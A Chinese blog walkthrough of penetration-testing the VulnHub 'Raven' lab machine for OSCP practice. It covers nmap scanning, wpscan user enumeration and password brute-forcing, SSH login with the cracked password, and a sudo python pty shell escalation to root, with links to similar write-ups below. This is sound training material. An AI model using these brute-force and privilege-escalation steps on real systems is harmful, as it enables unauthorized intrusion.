OSCP  Raven 靶机渗透

最新推荐文章于 2025-06-23 16:11:22 发布
最新推荐文章于 2025-06-23 16:11:22 发布
阅读量374 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: OSCP 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_34935231/article/details/115376374
本文介绍了通过Kali Linux对Raven靶机进行渗透测试的过程,包括信息收集、Web渗透及提权等步骤,最终成功获取root权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Raven 靶机渗透

目标:得到root权限
作者:shadow
时间:2021-04-01

请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。

一、信息收集

netdiscover -i eth0

Raven主机ip为172.16.1.17

nmap 查询开放端口

nmap -p- -A 172.16.1.17

查询到主机开放了80端口,打开浏览器看看

二、web渗透

查询源代码看看有什么发现没

源代码里面发现了wordpress,使用wpscan扫描下试试

wpscan --url http://172.16.1.17/wordpress --enumerate u --force --wp-content-dir wp-content

wpscan官网:http://wpscan.org/

爆破出2个用户,我们把2个用户做个数据字典尝试爆破下

vim user_raven.txt

wpscan --url http://172.16.1.17/wordpress --passwords /usr/share/wordlists/rockyou.txt --usernames user_raven.txt -t 25

成功爆破出密码

用户名:steven  密码:pink84

我们ssh登录

ssh steven@172.16.1.17

pink84

成功登录

三、提权

然后我们看下直接sudo是否可以提权

python竟然有权限不需要密码

直接

sudo python -c 'import pty;pty.spawn("/bin/sh")'

成功获得root权限

四、总结

总感觉不太对,flag就找到1个,哈哈,但是获得了root权限,其他的flag之后补下吧

oscp raven2靶机渗透过程
shatianyzg的博客
07-05 469
信息侦察阶段 用dirb扫描发现以下信息 ---- Entering directory: http://172.16.100.142/vendor/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode ‘-w’ if you want to scan it anyway) 找到第一个flag 寻找PHPMailer 5.2.16 的exp searchsploit phpmailer 拷贝exp到当前目录利用40
OSCP-Vulnhub靶机记录-digitalworldlocal-fall
深入交流学习:webMsec
09-30 413
-hh 隐藏char值为80的结果(错误的参数都这里报80,第一次wfuzz没有加此参数)尝试用读取/home/qiu目录下默认存ssh密钥文件,通过前面扫描端口知道他是开了ssh的。vulnhub和htb有很多为OSCP准备的靶机,都可以打一打。再回leafpad,搜索一下“enum”,看看枚举出什么目录。复制保存到攻击机,key文件最后要有一个回车,否则登录不上去。这里的GET参数是 file,可以尝试文件包含。那么,我们可以试一下,用哪个参数可以拼接进去。ls 一下,提示我们是低权限用户。
2021-12-03 kali渗透----Raven靶机
夕阳的街道的博客
12-03 2911
本文章仅供学习和参考! 欢迎交流~ 一、实验题目:kali渗透----Raven靶机 二、实验内容: 1. 信息收集 2. ssh爆破 3. 绕过限制sudo提权 4. wpscan扫描worpress cms 5. PHPMailer远程代码执行getshell 三、环境准备: 1. kali虚拟机:(IP:192.168.112.130) 2. Raven靶机:(IP:192.168.112.137) 四、实验步骤: 1. 信息收集: (1)端口扫描.
靶机Raven
weixin_43940853的博客
11-10 1255
大致看了看别人的wp,感觉这个靶机坐下来还是能获得不少东西的 大致分为两种方法,先来第一种比较简单的,第二种可能需要较长时间消化 kali : 192.168.230.224 target : 192.168.230.225 第一种方法(扫描->发现web服务->得知wordpress服务->wpscan扫描->发现用户名密码->用hydra爆破ssh(这里直接试出来...
CISSP和OSCP 金牌国际网安认证考证指南,(非常详细)零基础入门到精通,收藏这篇就够了
最新发布
Javachichi的博客
06-23 1005
信息安全领域有很多认证,其中CISSP(Certified Information Systems Security Professional)和OSCP(Offensive Security Certified Professional)是两大备受瞩目的权威认证。CISSP认证由国际信息系统安全认证联盟(ISC)²发起,是信息安全领域的“黄金标准”。该认证旨在评估信息安全专业人士的综合能力和知识水平,覆盖了信息安全的多个方面,包括但不限于网络安全、系统安全、应用安全安全管理和安全工程等。
OSCP Lampiao 靶机渗透
Shadow的博客
03-22 768
Lampiao 靶机渗透 目标:得到root权限 作者:shadow 时间:2021-03-22 请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 netdiscover -i eth0 Lampiao主机ip为172.16.1.15 nmap扫下所有端口 nmap -p- -A 172.16.1.15 看下有两个http,看下80端口
Raven: 2靶机入侵
weixin_30477797的博客
01-30 1195
0x00 前言 Raven 2是一个中等难度的boot2root虚拟靶机。有四个flag需要找出。在多次被攻破后,Raven Security采取了额外措施来增强他们的网络服务器安全以防止黑客入侵。 靶机下载地址:https://download.vulnhub.com/raven/Raven2.ova 0x01 存活主机 1.在windows上的scan ports工具对目标整个网段(...
Raven 2 靶机渗透
banacyo14206的博客
08-24 1089
0X00 前言 Raven 2中一共有四个flag,Raven 2是一个中级boot2root VM。有四个标志要捕获。在多次破坏之后,Raven Security采取了额外措施来强化他们的网络服务器,以防止黑客进入。 靶机下载地址:https://download.vulnhub.com/raven/Raven2.ova 提权辅助工具LinEnum下载:https://do...
oscp推荐的训练靶机raven2渗透过程
07-05
OSCP 训练靶机 Raven2 渗透过程详解 OSCP( Offensive Security Certified Professional)是 Offensive Security 公司提供的渗透测试认证,旨在验证个人的渗透测试技能。Raven2 是 OSCP 认证考试中的一个训练靶机,...
1-OSCP自学笔记-October靶机练习1
08-04
OSCP自学笔记-October靶机练习1】这篇教程主要介绍了如何通过渗透测试技术攻破一个名为"October"的靶机靶机来自于Vulnhub平台,作者选择了10台典型的靶机作为OSCP(Offensive Security Certified Professional)...
OSCP实战:Raven2靶机渗透及PHPMailer漏洞利用
总结来说,Raven2靶机渗透过程涵盖了信息收集、漏洞利用、数据库操作、代码编译与部署、以及权限升级等多个环节,是OSCP认证中提升渗透技术能力的重要实践步骤。每个环节都需要对相关工具和技术有深入理解和熟练掌握...
kali渗透综合靶机(十)--Raven靶机
W小哥
03-28 2239
一、靶机下载 下载链接:https://download.vulnhub.com/raven/Raven.ova 二、Raven靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.212.129 靶机IP:192.168.212.4 1、主机发现 nmap ...
OSCP - 6Days_Lab-v1.0.1靶机
小小猪的博客
06-09 451
OSCP - 6Days_Lab-v1.0.1靶机 arp-scan -l 扫描靶机IP地址 nmap -sV -Pn -A x.x.x.232 访问 http://x.x.x.232 输入折扣码,提示代码过期,没啥用处 查看页面源码 访问,得到出错,可能存在ssrf 修改src=后边参数为index.php,并没有拦截,也没有报错 使用dirb http://x.x.x.232,获取靶机网站目录结构文件 打开BP进行抓包,发现响应包是主页界面,访.
渗透测试靶机----Raven-1
久恙502的博客
04-05 508
渗透测试,打经历记录,大佬多多指点,谢谢!!!
OSCP靶机-Kioptix Level 2
ETO发展中心
08-02 507
同步发布:https://www.youi.xin/?p=449 1.信息收集 环境部署可参考上一篇https://www.youi.xin/?p=435 通过对c段扫描发现了靶机ip,nmap扫描目标端口信息如下: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99) | ssh-hostkey: | 1024 8f:3e:8b:1e:58:63:fe:cf:27:a.
靶机5 Raven
wj33333的博客
10-19 96
使用arp-scan确定目标目标靶机nmap详细扫描访问目标靶机80端口在页面的源码里,成功获得了第一个flag扫描目录查看点击README.md发现此网站安装了PHPMailer,并且版本号为5.2.16因为开放22端口。
# 【oscp系列】靶机1
weixin_44807430的博客
01-15 929
快速打通靶机
vulnhub——oscp靶机
Re1_zf的博客
10-21 1057
即使用这些命令从/目录中查找具有SUID权限位且属主为root的文件并将其输出,然后将所有错误重定向到/dev/null,使用find / -user root -perm -4000 -print 2>/dev/null。相比来说,我比较喜欢直接使用nmap对C段进行扫描,直接就把相关信息也扫描出来了,比较方便。前提是知道靶机跟自己在同一C段,这里用的是虚拟机NAT模式,所以可以知道必然在同一C段下。这里其实省了目录扫描的工作了已经,脚本检测发现80端口下有一个secret.txt文件。
OSCP系列】OSCP靶机-devguru(原创)
Lusen的博客
07-24 876
OSCP系列-devguru场做题记录
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

c2hhZG93

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值